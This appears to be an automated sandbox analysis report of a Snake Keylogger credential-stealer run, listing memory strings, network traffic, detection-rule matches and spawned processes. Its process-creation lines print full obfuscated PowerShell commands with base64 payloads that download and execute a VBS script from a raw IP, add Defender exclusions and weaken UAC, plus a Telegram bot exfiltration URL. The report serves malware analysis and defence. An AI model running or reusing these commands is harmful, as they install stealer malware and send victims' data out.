                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000004.00000002.2277973567.000001291007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2256554040.0000012901A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2277973567.00000129101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A39A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008524000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknown | Network traffic detected: HTTP traffic on port 50086 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknown | Network traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknown | Network traffic detected: HTTP traffic on port 50007 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50076
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknown | Network traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50035
                  Source: unknown | Network traffic detected: HTTP traffic on port 50076 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50079
                  Source: unknown | Network traffic detected: HTTP traffic on port 50026 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknown | Network traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 50052 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50085
                  Source: unknown | Network traffic detected: HTTP traffic on port 50045 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50007
                  Source: unknown | Network traffic detected: HTTP traffic on port 50085 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 50035 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50021
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50065
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50086
                  Source: unknown | Network traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50045
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknown | Network traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50069
                  Source: unknown | Network traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50026
                  Source: unknown | Network traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50052
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 50065 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 50069 -> 443
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49784 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49881 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49941 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50007 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50021 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50026 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50035 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50045 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50052 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50056 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50061 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50065 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50069 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50071 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50076 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50079 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50085 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50086 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50089 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50090 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50095 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.cs | .Net Code: TakeScreenshot
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.cs | .Net Code: TakeScreenshot
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.cs | .Net Code: TakeScreenshot
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, UltraSpeed.cs | .Net Code: TakeScreenshot
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

                  System Summary

                  Source: amsi32_1276.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7628.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_8000.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_4696.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7892.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7044.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7564.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_5044.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_5332.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.a380b24.16.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4696, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhK